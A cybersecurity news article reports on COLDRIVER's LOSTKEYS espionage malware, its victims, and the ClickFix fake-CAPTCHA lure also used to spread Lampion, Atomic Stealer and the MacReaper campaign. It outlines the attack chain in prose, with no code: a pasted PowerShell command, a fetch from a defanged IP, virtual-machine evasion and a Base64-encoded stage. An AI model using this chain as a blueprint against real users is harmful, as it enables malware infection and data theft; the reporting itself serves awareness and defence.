A new cyber threat has emerged from the Russia-linked hacking group COLDRIVER, also known as Callisto, Star Blizzard, or UNC4057. In a shift from its traditional credential-theft tactics, the group is now deploying a custom malware called LOSTKEYS Malware. The attacks are part of a sophisticated espionage campaign aimed at high-profile individuals.
According to the Google Threat Intelligence Group (GTIG), the COLDRIVER LOSTKEYS malware has been seen in action during January, March, and April 2025. Victims include current and former Western military advisors, government personnel, journalists, think tanks, NGOs, and people with ties to Ukraine.
How LOSTKEYS Malware Works
The LOSTKEYS malware is designed to silently harvest sensitive data. Once it infects a system, it scans for specific file types and directories, collecting documents, system details, and a list of active processes. It then sends this data to remote servers controlled by the attackers.
The malware is typically delivered through a social engineering tactic called ClickFix. This method tricks users into thinking they must complete a CAPTCHA. Victims are instructed to open the Windows Run dialog and paste a PowerShell command copied to their clipboard. This command fetches a secondary script from a remote IP address: 165.227.148[.]68.
Before running the final stage, the script checks for signs that it’s inside a virtual machine. These checks are likely used to avoid detection by cybersecurity tools. If the check passes, it downloads and decodes a Base64-encoded PowerShell script, which installs LOSTKEYS on the user’s device.
More Than Just Credential Theft
Security researcher Wesley Shields explains that COLDRIVER is well-known for stealing login credentials and then accessing emails and contact lists. However, this new wave of attacks shows the group is evolving. LOSTKEYS is now the second known malware used by COLDRIVER, following a previous tool called SPICA.
Like SPICA, LOSTKEYS appears to be used in highly targeted operations. It’s not being deployed on a massive scale, but rather against selected victims with valuable information. This suggests the group is focusing on quality over quantity.
Further analysis from Google shows that earlier versions of LOSTKEYS may have existed as far back as December 2023, disguised as software linked to the Maltego open-source investigation platform. Whether these samples are linked to COLDRIVER is still unclear.
The ClickFix social engineering method is becoming increasingly popular. It has been adopted by other cybercriminals to spread a range of malware, including a banking trojan called Lampion and the macOS-based Atomic Stealer.
Palo Alto Networks Unit 42 has tracked Lampion infections using phishing emails. These messages contain ZIP files with HTML pages that guide users through the ClickFix steps. Once again, users are tricked into pasting harmful code into their systems.
Lampion’s infection process is broken into multiple, scattered steps. Each runs as a separate process, making it harder for antivirus tools to detect the full attack chain.
Meanwhile, Atomic Stealer is being distributed via a new combo attack called EtherHiding. This method uses Binance Smart Chain (BSC) contracts to hide malicious commands. When users click “I’m not a robot” on a fake CAPTCHA, a hidden script runs and installs the stealer on macOS.
Large-Scale Watering Hole Attack Detected
An independent researcher known as Badbyte discovered that nearly 2,800 legitimate websites have been hijacked to host these fake CAPTCHA pages. The large campaign, named MacReaper, uses full-screen iframes, obfuscated JavaScript, and blockchain tech to avoid detection.
As cyber threats evolve, COLDRIVER LOSTKEYS malware shows how advanced and targeted modern espionage attacks have become. Organizations and individuals must stay alert and adopt strong cybersecurity practices.
